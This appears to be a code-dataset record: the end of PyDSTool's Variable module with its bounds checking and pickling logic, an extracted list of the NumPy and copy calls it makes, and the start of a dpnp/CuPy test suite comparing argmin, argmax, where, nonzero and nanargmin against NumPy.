"Independent variable value(s) " "out of range in Variable call"
)
else:
raise ValueError(
"Independent variable value " + str(indepvar) + " out of "
"range in Variable call"
)
try:
if vectorizable:
depvar = self.output(indepvar)
else:
depvar = [self.output(ival) for ival in indepvar]
depvar_ok = True
except PyDSTool_BoundsError as errinfo:
depvar_ok = False
# Now check that all computed values were in depdomain
if depvar_ok:
# no need to use self.trajdrange instead of
# self.depdomain because we trust that self.output
# generated the output within its own bounds!
if isinstance(depvar, (_seq_types, Pointset)):
if isinstance(depvar, Pointset):
dv = depvar.toarray()
else:
dv = depvar
for d in dv:
# use 'in' so that this is compatible with
# interval, array and index indeps
try:
contresult = d in self.depdomain
except PyDSTool_UncertainValueError as errinfo:
contresult = True
if checklevel == 2:
# find which indepvar was the cause of
# the uncertain value
try:
# list
depix = dv.index(d)
except AttributeError:
# array
depix = dv.tolist().index(d)
self.diagnostics.warnings.append(
(indepvar[depix], errinfo.value)
)
if not isfinite(d):
# DEBUG
# print dv
# print self.output, "\n"
raise PyDSTool_BoundsError(
"Return value was not finite/defined (%s)" % str(d)
)
if not contresult:
depvar_ok = False
break
elif depvar is None:
# DEBUG
# print "*** Debug info for variable: ", self.name
# print "Independent variable domain: ", self.indepdomain._infostr(1)
# print "Dependent variable domain: ", self.depdomain._infostr(1)
raise ValueError(
"Cannot compute a return value for "
"independent variable value " + str(indepvar)
)
else:
if isinstance(depvar, Point):
dv = depvar[0]
else:
dv = depvar
try:
depvar_ok = dv in self.depdomain
except PyDSTool_UncertainValueError as errinfo:
if checklevel == 2:
self.diagnostics.warnings.append((indepvar, errinfo.varval))
if not isfinite(dv):
# DEBUG
# print dv
# print self.output, "\n"
raise PyDSTool_BoundsError(
"Return value was not finite/defined (%s)" % str(dv)
)
# return value if depvar in bounds
if depvar_ok:
return dv
else:
# DEBUG
# print "Variable '%s' -"%self.name, "dependent var domain: ", \
# self.depdomain._infostr(1)
# self.diagnostics.showWarnings()
if vectorizable:
# DEBUG
# print self.output(indepvar), "\n"
raise PyDSTool_BoundsError(
"Computed value(s) %f outside" % dv
+ " validity range in Variable call"
)
else:
raise PyDSTool_BoundsError(
"Computed value %f outside" % dv
+ " validity range in Variable call"
)
else:
# level 3 -- exception will be raised for uncertain case
indepvar_ok = False
try:
# don't trap uncertain case exception from
# Interval.__contains__
if isinstance(indepvar, _seq_types):
vectorizable = self._vectorizable
indepvar_ok = all([i in self.indepdomain for i in indepvar])
else:
vectorizable = True
indepvar_ok = indepvar in self.indepdomain
except TypeError as e:
raise TypeError(
"Something messed up with the Variable " "initialization: " + str(e)
)
else:
if not indepvar_ok:
raise ValueError(
"Independent variable "
+ str(indepvar)
+ " out of range in Variable call"
)
# Don't need 'if indepvar_ok' because exception would have
# been raised.
# For this checklevel, don't trap uncertain case exception from
# Interval.__contains__
try:
if vectorizable:
depvar = self.output(indepvar)
depvar_ok = depvar in self.depdomain
else:
depvar = [self.output(ival) for ival in indepvar]
depvar_ok = all([d in self.depdomain for d in depvar])
except PyDSTool_BoundsError as e:
raise ValueError(
"Cannot compute a return value for "
"this independent variable value: " + str(e)
)
except PyDSTool_TypeError:
if not self.defined:
print("Variable '%s' not fully defined." % self.name)
return None
else:
raise
else:
if depvar_ok:
return depvar
else:
if vectorizable:
raise PyDSTool_BoundsError(
"Computed value(s) "
"outside validity range in Variable call"
)
else:
raise PyDSTool_BoundsError(
"Computed value "
+ str(depvar)
+ "outside validity range in Variable call"
)
def __repr__(self):
return self._infostr(verbose=0)
__str__ = __repr__
def _infostr(self, verbose=1):
if verbose == 0:
return "Variable " + self.coordname + "(" + self.indepvarname + ")"
else:
try:
if isinputcts(self):
ipstr = "continuous"
else:
ipstr = "discrete"
except ValueError:
ipstr = "not defined"
outputStr = (
"Variable:\n Independent variable '"
+ self.indepvarname
+ "' ["
+ ipstr
+ "]\n"
)
try:
if isoutputcts(self):
opstr = "continuous"
else:
opstr = "discrete"
except ValueError:
opstr = "not defined"
outputStr += " defined in domain " + str(self.indepdomain)
if verbose == 2:
if self.trajirange is None:
outputStr += "\n ranges not known for this trajectory"
else:
outputStr += "\n trajectory ranges " + str(self.trajirange)
outputStr += (
"\nDependent variable '"
+ self.coordname
+ "' ["
+ opstr
+ "]\n defined in domain "
)
if not isinstance(self.depdomain, Interval):
outputStr += _num_type2name[self.coordtype] + ": "
outputStr += str(self.depdomain)
if verbose == 2:
if self.trajdrange is None:
outputStr += "\n ranges not known for this trajectory"
else:
outputStr += "\n trajectory ranges " + str(self.trajdrange)
return outputStr
def info(self, verboselevel=1):
print(self._infostr(verboselevel))
def __copy__(self):
pickledself = pickle.dumps(self)
return pickle.loads(pickledself)
def __deepcopy__(self, memo=None, _nil=[]):
pickledself = pickle.dumps(self)
return pickle.loads(pickledself)
def __getstate__(self):
d = copy.copy(self.__dict__)
# remove reference to Cfunc types by converting to strings
d["indepvartype"] = _num_type2name[self.indepvartype]
d["coordtype"] = _num_type2name[self.coordtype]
if "funcspec" in self._funcreg:
# then self is Imp/ExplicitFnGen and 'output' could not
# be put in _funcreg because it relies on wrap_output
# function that's not in the global namespace (so pickle fails
# to find it)
del d["output"]
for fname, finfo in self._funcreg.items():
if finfo[0] == "self":
try:
del d[fname]
except KeyError:
pass
# else it's a Variable class method which won't get pickled
# anyway, and will be restored to any class not in possession
# of it if this object is unpickled
return d
def __setstate__(self, state):
self.__dict__.update(state)
# print self.name, "- setstate: self.depdomain = ", self.depdomain.get()
# reinstate Cfunc types
self.indepvartype = _num_name2type[self.indepvartype]
self.coordtype = _num_name2type[self.coordtype]
# reinstate dynamic methods / functions
for fname, finfo in self._funcreg.items():
if finfo[0] == "self" and not hasattr(eval(finfo[0]), fname):
# avoids special entry for 'outputdata'
setattr(eval(finfo[0]), fname, finfo[1])
if "funcspec" in self._funcreg:
# Add the specific mapping functions for Ex/ImplicitFnGen objects
funcspec = self._funcreg["funcspec"][1]
outputdata = self._funcreg["outputdata"][1]
if hasattr(self, "_var_namemap"):
var_namemap = self._var_namemap
else:
var_namemap = None
if hasattr(self, "initialconditions"):
ics = copy.copy(self.initialconditions)
else:
ics = None
if hasattr(self, "_refvars"):
if self._refvars is not None and self._refvars != []:
refvars = [copy.copy(v) for v in self._refvars]
else:
refvars = None
else:
refvars = None
# if refvars in dictionary then just leave them there!
self.setOutput(
outputdata, funcspec, self.globalt0, var_namemap, ics, refvars
)
def __del__(self):
# delete object-specific class methods etc. before deleting
# to avoid crowding namespace
## if hasattr(self, 'output'):
## del self.output
for fname, finfo in self._funcreg.items():
# Treat special cases first
if finfo[0] is None:
# don't want to eval(None) below
continue
elif fname == "_impfn":
exec_str = "del Variable." + finfo[0]
try:
exec(exec_str)
except AttributeError:
# Uncertain why the name appears multiple times for their
# to be multiple attempts to delete it (which of course
# fail after the first successful attempt)
pass
elif fname is "funcspec":
# doesn't refer to any dynamically-created methods
# so ignore
pass
elif fname is "outputdata":
# doesn't refer to any dynamically-created methods
# so ignore
pass
elif hasattr(eval(finfo[0]), fname):
exec_str = "del " + finfo[0] + "." + fname
try:
exec(exec_str)
except RuntimeError:
# sometimes get these when objects improperly delted
# and new objects with the same name created
pass
if hasattr(self, "_refvars"):
if self._refvars is not None and self._refvars != []:
for v in self._refvars:
v.__del__()
class HybridVariable(Variable):
"""Mimics part of the API of a non-hybrid variable.
This is a somewhat ugly hack as it's implemented by using a whole
HybridTrajectory object to extract individual variable values,
rather than having extracted a sequence of Variable objects from
a HT and stitching them back together as a single entity."""
def __init__(self, hybridtraj, coordname, indepdomain, abseps=None):
# store reference to the hybrid trajectory
self._ht = hybridtraj
self.name = "Hybrid variable " + coordname
self.outputdata = None # not used
self.defined = True
self.indepvarname = "t"
self.indepdomain = indepdomain
self.indepvartype = float
self.coordname = coordname
self.depdomain = Interval(self.coordname, float, [-Inf, Inf], abseps=abseps)
self.coordtype = float
self.trajirange = None
self.trajdrange = None
self.diagnostics = Diagnostics()
# important that this isn't a Pointset for Variable.py's
# isinputcts, isoutputcts, etc.
self.output = None
def __call__(self, indepvar, checklevel=0):
return self._ht(indepvar, self.coordname, checklevel=checklevel)
def getDataPoints(self):
"""Returns a Pointset of independent and dependent variable values,
provided variable is based on a mesh (otherwise None is returned).
"""
return self._ht.sample([self.coordname])
def underlyingMesh(self):
"""Reveal underlying mesh as arrays, rather than Pointset as returned
by getDataPoints method."""
vs = self._ht.sample([self.coordname])
return array([vs.indepvararray, vs.coordarray[0]])
def __repr__(self):
return "Hybrid variable " + self.coordname
__str__ = __repr__
def info(self, verboselevel=1):
return "Hybrid variable " + self.coordname
# overrides from Variable class
def __getstate__(self):
return copy.copy(self.__dict__)
def __setstate__(self, state):
self.__dict__.update(state)
def __del__(self):
# must override Variable.__del__
pass
class OutputFn(object):
"""One-dimensional function wrapper."""
def __init__(self, fn, datapoints=None, numtypes=(float64, float64), abseps=None):
assert isinstance(fn, types.FunctionType) or isinstance(
fn, types.BuiltinFunctionType
), "fn argument must be a regular Python function"
self.fn = fn
# datapoints can be exhaustive list of known values for fn or
# a Interval range for continuous-valued functions
if datapoints is None:
datapoints = (
Interval("indepvardom", numtypes[0], [-Inf, Inf], abseps=abseps),
Interval("depvardom", numtypes[1], [-Inf, Inf], abseps=abseps),
)
try:
self.datapoints = (datapoints[0], datapoints[1])
except TypeError:
raise TypeError(
"datapoints argument must be a 2-tuple or list " "of 2-tuples or lists"
)
try:
self.types = (numtypes[0], numtypes[1])
except TypeError:
raise TypeError(
"numtypes argument must be a 2-tuple or list " "of 2-tuples or lists"
)
def __call__(self, arg):
if isinstance(arg, _seq_types):
try:
return self.fn(arg)
except:
return array([self.fn(v) for v in arg])
else:
return self.fn(arg)
def __getstate__(self):
d = copy.copy(self.__dict__)
# remove reference to Cfunc types by converting to strings
d["types"] = (_num_type2name[self.types[0]], _num_type2name[self.types[1]])
return d
def __setstate__(self, state):
self.__dict__.update(state)
# reinstate Cfunc types
self.types = (_num_name2type[self.types[0]], _num_name2type[self.types[1]])
# ---------------------------------------------------------------------
def isinputcts(obj):
if isinstance(obj, Variable):
if obj.defined:
if compareNumTypes(obj.indepvartype, float64):
return isinstance(obj.indepdomain, Interval) and not isinstance(
obj.output, Pointset
)
elif compareNumTypes(obj.indepvartype, int32):
return False
else:
raise TypeError("Unsupported independent variable type for Variable")
else:
raise ValueError("Variable is not fully defined")
else:
# provide support for e.g. Trajectories. Cannot use Trajectory class
# name explicitly here because will run into an infinite import loop
# between Variable and Trajectory!
if compareNumTypes(obj.indepvartype, float64):
return isinstance(obj.indepdomain, Interval)
def isinputdiscrete(var):
return not isinputcts(var)
##def isinputdiscrete(var):
## if compareNumTypes(var.indepvartype, float64):
## return type(var.indepdomain) == ndarray or \
## isinstance(var.output, Pointset)
## elif compareNumTypes(var.indepvartype, int32):
## return True
## else:
## raise TypeError("Unsupported independent variable type for Variable")
def isoutputcts(var):
assert isinstance(var, Variable), "Argument must be a Variable"
if var.defined:
if compareNumTypes(var.coordtype, float64):
return isinstance(var.depdomain, Interval) and not isinstance(
var.output, Pointset
)
elif compareNumTypes(var.coordtype, int32):
return False
else:
raise TypeError("Unsupported dependent variable type for Variable")
else:
raise ValueError("Variable is not fully defined")
def isoutputdiscrete(obj):
return not isoutputcts(obj)
def iscontinuous(var):
"""Determine if variable is continuously defined on its input and
output domains."""
assert isinstance(var, Variable), "Argument must be a Variable"
return isinputcts(var) and isoutputcts(var)
def isdiscrete(var):
"""Determine if variable is discretely defined on its input and
output domains."""
return not (isinputcts(var) and isoutputcts(var))
|
[
"six.exec_",
"numpy.asarray",
"copy.copy",
"numpy.isfinite",
"numpy.array",
"numpy.all"
] |
[((45847, 45871), 'copy.copy', 'copy.copy', (['self.__dict__'], {}), '(self.__dict__)\n', (45856, 45871), False, 'import copy\n'), ((51884, 51927), 'numpy.array', 'array', (['[vs.indepvararray, vs.coordarray[0]]'], {}), '([vs.indepvararray, vs.coordarray[0]])\n', (51889, 51927), False, 'from numpy import Inf, NaN, isfinite, sometrue, alltrue, any, all, array, float64, int32, ndarray, asarray\n'), ((52210, 52234), 'copy.copy', 'copy.copy', (['self.__dict__'], {}), '(self.__dict__)\n', (52219, 52234), False, 'import copy\n'), ((53878, 53902), 'copy.copy', 'copy.copy', (['self.__dict__'], {}), '(self.__dict__)\n', (53887, 53902), False, 'import copy\n'), ((31964, 31981), 'numpy.asarray', 'asarray', (['indepvar'], {}), '(indepvar)\n', (31971, 31981), False, 'from numpy import Inf, NaN, isfinite, sometrue, alltrue, any, all, array, float64, int32, ndarray, asarray\n'), ((13229, 13261), 'six.exec_', 'six.exec_', (['impfn_str', 'this_scope'], {}), '(impfn_str, this_scope)\n', (13238, 13261), False, 'import six\n'), ((47845, 47878), 'copy.copy', 'copy.copy', (['self.initialconditions'], {}), '(self.initialconditions)\n', (47854, 47878), False, 'import copy\n'), ((4522, 4539), 'numpy.asarray', 'asarray', (['indepvar'], {}), '(indepvar)\n', (4529, 4539), False, 'from numpy import Inf, NaN, isfinite, sometrue, alltrue, any, all, array, float64, int32, ndarray, asarray\n'), ((15564, 15609), 'numpy.array', 'array', (['[pts.indepvararray, pts.coordarray[0]]'], {}), '([pts.indepvararray, pts.coordarray[0]])\n', (15569, 15609), False, 'from numpy import Inf, NaN, isfinite, sometrue, alltrue, any, all, array, float64, int32, ndarray, asarray\n'), ((3765, 3779), 'numpy.array', 'array', (['vals[i]'], {}), '(vals[i])\n', (3770, 3779), False, 'from numpy import Inf, NaN, isfinite, sometrue, alltrue, any, all, array, float64, int32, ndarray, asarray\n'), ((5152, 5166), 'numpy.array', 'array', (['vals[i]'], {}), '(vals[i])\n', (5157, 5166), False, 'from numpy import Inf, NaN, isfinite, sometrue, alltrue, any, all, array, float64, int32, ndarray, asarray\n'), ((25594, 25605), 'numpy.isfinite', 'isfinite', (['d'], {}), '(d)\n', (25602, 25605), False, 'from numpy import Inf, NaN, isfinite, sometrue, alltrue, any, all, array, float64, int32, ndarray, asarray\n'), ((30078, 30089), 'numpy.isfinite', 'isfinite', (['d'], {}), '(d)\n', (30086, 30089), False, 'from numpy import Inf, NaN, isfinite, sometrue, alltrue, any, all, array, float64, int32, ndarray, asarray\n'), ((41281, 41329), 'numpy.all', 'all', (['[(i in self.indepdomain) for i in indepvar]'], {}), '([(i in self.indepdomain) for i in indepvar])\n', (41284, 41329), False, 'from numpy import Inf, NaN, isfinite, sometrue, alltrue, any, all, array, float64, int32, ndarray, asarray\n'), ((42406, 42450), 'numpy.all', 'all', (['[(d in self.depdomain) for d in depvar]'], {}), '([(d in self.depdomain) for d in depvar])\n', (42409, 42450), False, 'from numpy import Inf, NaN, isfinite, sometrue, alltrue, any, all, array, float64, int32, ndarray, asarray\n'), ((48072, 48084), 'copy.copy', 'copy.copy', (['v'], {}), '(v)\n', (48081, 48084), False, 'import copy\n'), ((22478, 22513), 'copy.copy', 'copy.copy', (['outputdata.coordnames[0]'], {}), '(outputdata.coordnames[0])\n', (22487, 22513), False, 'import copy\n'), ((26008, 26032), 'numpy.array', 'array', (['d', 'self.coordtype'], {}), '(d, self.coordtype)\n', (26013, 26032), False, 'from numpy import Inf, NaN, isfinite, sometrue, alltrue, any, all, array, float64, int32, ndarray, asarray\n'), ((26104, 26112), 'numpy.array', 'array', (['d'], {}), '(d)\n', (26109, 26112), False, 'from numpy import Inf, NaN, isfinite, sometrue, alltrue, any, all, array, float64, int32, ndarray, asarray\n'), ((26185, 26193), 'numpy.array', 'array', (['d'], {}), '(d)\n', (26190, 26193), False, 'from numpy import Inf, NaN, isfinite, sometrue, alltrue, any, all, array, float64, int32, ndarray, asarray\n'), ((30320, 30344), 'numpy.array', 'array', (['d', 'self.coordtype'], {}), '(d, self.coordtype)\n', (30325, 30344), False, 'from numpy import Inf, NaN, isfinite, sometrue, alltrue, any, all, array, float64, int32, ndarray, asarray\n'), ((30414, 30422), 'numpy.array', 'array', (['d'], {}), '(d)\n', (30419, 30422), False, 'from numpy import Inf, NaN, isfinite, sometrue, alltrue, any, all, array, float64, int32, ndarray, asarray\n'), ((30495, 30503), 'numpy.array', 'array', (['d'], {}), '(d)\n', (30500, 30503), False, 'from numpy import Inf, NaN, isfinite, sometrue, alltrue, any, all, array, float64, int32, ndarray, asarray\n'), ((38294, 38305), 'numpy.isfinite', 'isfinite', (['d'], {}), '(d)\n', (38302, 38305), False, 'from numpy import Inf, NaN, isfinite, sometrue, alltrue, any, all, array, float64, int32, ndarray, asarray\n'), ((39744, 39756), 'numpy.isfinite', 'isfinite', (['dv'], {}), '(dv)\n', (39752, 39756), False, 'from numpy import Inf, NaN, isfinite, sometrue, alltrue, any, all, array, float64, int32, ndarray, asarray\n')]
|
import unittest
import numpy
import pytest
import dpnp as cupy
from tests.third_party.cupy import testing
# from cupy.core import _accelerator
@testing.gpu
class TestSearch(unittest.TestCase):
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose()
def test_argmax_all(self, xp, dtype):
a = testing.shaped_random((2, 3), xp, dtype)
return a.argmax()
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose()
def test_external_argmax_all(self, xp, dtype):
a = testing.shaped_random((2, 3), xp, dtype)
return xp.argmax(a)
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose(accept_error=ValueError)
def test_argmax_nan(self, xp, dtype):
a = xp.array([float('nan'), -1, 1], dtype)
return a.argmax()
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose()
def test_argmax_axis_large(self, xp, dtype):
a = testing.shaped_random((3, 1000), xp, dtype)
return a.argmax(axis=0)
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose()
def test_external_argmax_axis_large(self, xp, dtype):
a = testing.shaped_random((3, 1000), xp, dtype)
return xp.argmax(a, axis=0)
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose()
def test_argmax_axis0(self, xp, dtype):
a = testing.shaped_random((2, 3, 4), xp, dtype)
return a.argmax(axis=0)
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose()
def test_argmax_axis1(self, xp, dtype):
a = testing.shaped_random((2, 3, 4), xp, dtype)
return a.argmax(axis=1)
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose()
def test_argmax_axis2(self, xp, dtype):
a = testing.shaped_random((2, 3, 4), xp, dtype)
return a.argmax(axis=2)
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose()
def test_argmax_tie(self, xp, dtype):
a = xp.array([0, 5, 2, 3, 4, 5], dtype)
return a.argmax()
@testing.for_all_dtypes(no_complex=True)
def test_argmax_zero_size(self, dtype):
for xp in (numpy, cupy):
a = testing.shaped_random((0, 1), xp, dtype)
with pytest.raises(ValueError):
a.argmax()
@testing.for_all_dtypes(no_complex=True)
def test_argmax_zero_size_axis0(self, dtype):
for xp in (numpy, cupy):
a = testing.shaped_random((0, 1), xp, dtype)
with pytest.raises(ValueError):
a.argmax(axis=0)
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose()
def test_argmax_zero_size_axis1(self, xp, dtype):
a = testing.shaped_random((0, 1), xp, dtype)
return a.argmax(axis=1)
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose()
def test_argmin_all(self, xp, dtype):
a = testing.shaped_random((2, 3), xp, dtype)
return a.argmin()
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose(accept_error=ValueError)
def test_argmin_nan(self, xp, dtype):
a = xp.array([float('nan'), -1, 1], dtype)
return a.argmin()
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose()
def test_external_argmin_all(self, xp, dtype):
a = testing.shaped_random((2, 3), xp, dtype)
return xp.argmin(a)
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose()
def test_argmin_axis_large(self, xp, dtype):
a = testing.shaped_random((3, 1000), xp, dtype)
return a.argmin(axis=0)
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose()
def test_external_argmin_axis_large(self, xp, dtype):
a = testing.shaped_random((3, 1000), xp, dtype)
return xp.argmin(a, axis=0)
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose()
def test_argmin_axis0(self, xp, dtype):
a = testing.shaped_random((2, 3, 4), xp, dtype)
return a.argmin(axis=0)
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose()
def test_argmin_axis1(self, xp, dtype):
a = testing.shaped_random((2, 3, 4), xp, dtype)
return a.argmin(axis=1)
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose()
def test_argmin_axis2(self, xp, dtype):
a = testing.shaped_random((2, 3, 4), xp, dtype)
return a.argmin(axis=2)
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose()
def test_argmin_tie(self, xp, dtype):
a = xp.array([0, 1, 2, 3, 0, 5], dtype)
return a.argmin()
@testing.for_all_dtypes(no_complex=True)
def test_argmin_zero_size(self, dtype):
for xp in (numpy, cupy):
a = testing.shaped_random((0, 1), xp, dtype)
with pytest.raises(ValueError):
return a.argmin()
@testing.for_all_dtypes(no_complex=True)
def test_argmin_zero_size_axis0(self, dtype):
for xp in (numpy, cupy):
a = testing.shaped_random((0, 1), xp, dtype)
with pytest.raises(ValueError):
a.argmin(axis=0)
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose()
def test_argmin_zero_size_axis1(self, xp, dtype):
a = testing.shaped_random((0, 1), xp, dtype)
return a.argmin(axis=1)
# This class compares CUB results against NumPy's
# TODO(leofang): test axis after support is added
# @testing.parameterize(*testing.product({
# 'shape': [(10,), (10, 20), (10, 20, 30), (10, 20, 30, 40)],
# 'order': ('C', 'F'),
# }))
# @testing.gpu
# @unittest.skipUnless(cupy.cuda.cub.available, 'The CUB routine is not enabled')
# class TestCubReduction(unittest.TestCase):
# def setUp(self):
# self.old_accelerators = _accelerator.get_routine_accelerators()
# _accelerator.set_routine_accelerators(['cub'])
# def tearDown(self):
# _accelerator.set_routine_accelerators(self.old_accelerators)
# @testing.for_dtypes('bhilBHILefdFD')
# @testing.numpy_cupy_allclose(rtol=1E-5)
# def test_cub_argmin(self, xp, dtype):
# a = testing.shaped_random(self.shape, xp, dtype)
# if self.order == 'C':
# a = xp.ascontiguousarray(a)
# else:
# a = xp.asfortranarray(a)
# if xp is numpy:
# return a.argmin()
# # xp is cupy, first ensure we really use CUB
# ret = cupy.empty(()) # Cython checks return type, need to fool it
# func = 'cupy.core._routines_statistics.cub.device_reduce'
# with testing.AssertFunctionIsCalled(func, return_value=ret):
# a.argmin()
# # ...then perform the actual computation
# return a.argmin()
# @testing.for_dtypes('bhilBHILefdFD')
# @testing.numpy_cupy_allclose(rtol=1E-5)
# def test_cub_argmax(self, xp, dtype):
# a = testing.shaped_random(self.shape, xp, dtype)
# if self.order == 'C':
# a = xp.ascontiguousarray(a)
# else:
# a = xp.asfortranarray(a)
# if xp is numpy:
# return a.argmax()
# # xp is cupy, first ensure we really use CUB
# ret = cupy.empty(()) # Cython checks return type, need to fool it
# func = 'cupy.core._routines_statistics.cub.device_reduce'
# with testing.AssertFunctionIsCalled(func, return_value=ret):
# a.argmax()
# # ...then perform the actual computation
# return a.argmax()
@testing.gpu
@testing.parameterize(*testing.product({
'func': ['argmin', 'argmax'],
'is_module': [True, False],
'shape': [(3, 4), ()],
}))
class TestArgMinMaxDtype(unittest.TestCase):
@testing.for_dtypes(
dtypes=[numpy.int8, numpy.int16, numpy.int32, numpy.int64],
name='result_dtype')
@testing.for_all_dtypes(name='in_dtype')
def test_argminmax_dtype(self, in_dtype, result_dtype):
a = testing.shaped_random(self.shape, cupy, in_dtype)
if self.is_module:
func = getattr(cupy, self.func)
y = func(a, dtype=result_dtype)
else:
func = getattr(a, self.func)
y = func(dtype=result_dtype)
assert y.shape == ()
assert y.dtype == result_dtype
@testing.parameterize(
{'cond_shape': (2, 3, 4), 'x_shape': (2, 3, 4), 'y_shape': (2, 3, 4)},
{'cond_shape': (4,), 'x_shape': (2, 3, 4), 'y_shape': (2, 3, 4)},
{'cond_shape': (2, 3, 4), 'x_shape': (2, 3, 4), 'y_shape': (3, 4)},
{'cond_shape': (3, 4), 'x_shape': (2, 3, 4), 'y_shape': (4,)},
)
@testing.gpu
class TestWhereTwoArrays(unittest.TestCase):
@testing.for_all_dtypes_combination(
names=['cond_type', 'x_type', 'y_type'])
@testing.numpy_cupy_allclose()
def test_where_two_arrays(self, xp, cond_type, x_type, y_type):
m = testing.shaped_random(self.cond_shape, xp, xp.bool_)
# Almost all values of a matrix `shaped_random` makes are not zero.
# To make a sparse matrix, we need multiply `m`.
cond = testing.shaped_random(self.cond_shape, xp, cond_type) * m
x = testing.shaped_random(self.x_shape, xp, x_type, seed=0)
y = testing.shaped_random(self.y_shape, xp, y_type, seed=1)
return xp.where(cond, x, y)
@testing.parameterize(
{'cond_shape': (2, 3, 4)},
{'cond_shape': (4,)},
{'cond_shape': (2, 3, 4)},
{'cond_shape': (3, 4)},
)
@testing.gpu
class TestWhereCond(unittest.TestCase):
@testing.for_all_dtypes()
@testing.numpy_cupy_array_equal()
def test_where_cond(self, xp, dtype):
m = testing.shaped_random(self.cond_shape, xp, xp.bool_)
cond = testing.shaped_random(self.cond_shape, xp, dtype) * m
return xp.where(cond)
@testing.gpu
class TestWhereError(unittest.TestCase):
def test_one_argument(self):
for xp in (numpy, cupy):
cond = testing.shaped_random((3, 4), xp, dtype=xp.bool_)
x = testing.shaped_random((2, 3, 4), xp, xp.int32)
with pytest.raises(ValueError):
xp.where(cond, x)
@testing.parameterize(
{'array': numpy.empty((0,))},
{'array': numpy.empty((0, 2))},
{'array': numpy.empty((0, 2, 0))},
)
@testing.gpu
class TestNonzero(unittest.TestCase):
@testing.for_all_dtypes()
@testing.numpy_cupy_array_equal()
def test_nonzero(self, xp, dtype):
array = xp.array(self.array, dtype=dtype)
return xp.nonzero(array)
@testing.parameterize(
{'array': numpy.array(0)},
{'array': numpy.array(1)},
)
@testing.gpu
@testing.with_requires('numpy>=1.17.0')
class TestNonzeroZeroDimension(unittest.TestCase):
@testing.for_all_dtypes()
def test_nonzero(self, dtype):
for xp in (numpy, cupy):
array = xp.array(self.array, dtype=dtype)
with pytest.raises(DeprecationWarning):
xp.nonzero(array)
@testing.parameterize(
{'array': numpy.array(0)},
{'array': numpy.array(1)},
{'array': numpy.empty((0,))},
{'array': numpy.empty((0, 2))},
{'array': numpy.empty((0, 2, 0))},
)
@testing.gpu
class TestFlatNonzero(unittest.TestCase):
@testing.for_all_dtypes()
@testing.numpy_cupy_array_equal()
def test_flatnonzero(self, xp, dtype):
array = xp.array(self.array, dtype=dtype)
return xp.flatnonzero(array)
@testing.parameterize(
{'array': numpy.empty((0,))},
{'array': numpy.empty((0, 2))},
{'array': numpy.empty((0, 2, 0))},
)
@testing.gpu
class TestArgwhere(unittest.TestCase):
@testing.for_all_dtypes()
@testing.numpy_cupy_array_equal()
def test_argwhere(self, xp, dtype):
array = xp.array(self.array, dtype=dtype)
return xp.argwhere(array)
# DPNP_BUG
# dpnp/backend.pyx:86: in dpnp.backend.dpnp_array
# raise TypeError(f"Intel NumPy array(): Unsupported non-sequence obj={type(obj)}")
# E TypeError: Intel NumPy array(): Unsupported non-sequence obj=<class 'int'>
# @testing.parameterize(
# {'array': cupy.array(1)},
# )
# @testing.gpu
# class TestArgwhereZeroDimension(unittest.TestCase):
# def test_argwhere(self):
# with testing.assert_warns(DeprecationWarning):
# return cupy.nonzero(self.array)
@testing.gpu
class TestNanArgMin(unittest.TestCase):
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose()
def test_nanargmin_all(self, xp, dtype):
a = testing.shaped_random((2, 3), xp, dtype)
return xp.nanargmin(a)
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose(accept_error=ValueError)
def test_nanargmin_nan(self, xp, dtype):
a = xp.array([float('nan'), -1, 1], dtype)
return xp.nanargmin(a)
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose(accept_error=ValueError)
def test_nanargmin_nan2(self, xp, dtype):
a = xp.array([float('nan'), float('nan'), -1, 1], dtype)
return xp.nanargmin(a)
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose(accept_error=ValueError)
def test_nanargmin_nan3(self, xp, dtype):
a = xp.array([float('nan'), float('nan'), -1, 1, 1.0, -2.0], dtype)
return xp.nanargmin(a)
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose(accept_error=ValueError)
def test_nanargmin_nan4(self, xp, dtype):
a = xp.array([-1, 1, 1.0, -2.0, float('nan'), float('nan')],
dtype)
return xp.nanargmin(a)
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose(accept_error=ValueError)
def test_nanargmin_nan5(self, xp, dtype):
a = xp.array([-1, 1, 1.0, -2.0, float('nan'), float('nan'), -1, 1],
dtype)
return xp.nanargmin(a)
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose()
def test_nanargmin_axis_large(self, xp, dtype):
a = testing.shaped_random((3, 1000), xp, dtype)
return xp.nanargmin(a, axis=0)
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose()
def test_nanargmin_axis0(self, xp, dtype):
a = testing.shaped_random((2, 3, 4), xp, dtype)
return xp.nanargmin(a, axis=0)
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose()
def test_nanargmin_axis1(self, xp, dtype):
a = testing.shaped_random((2, 3, 4), xp, dtype)
return xp.nanargmin(a, axis=1)
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose()
def test_nanargmin_axis2(self, xp, dtype):
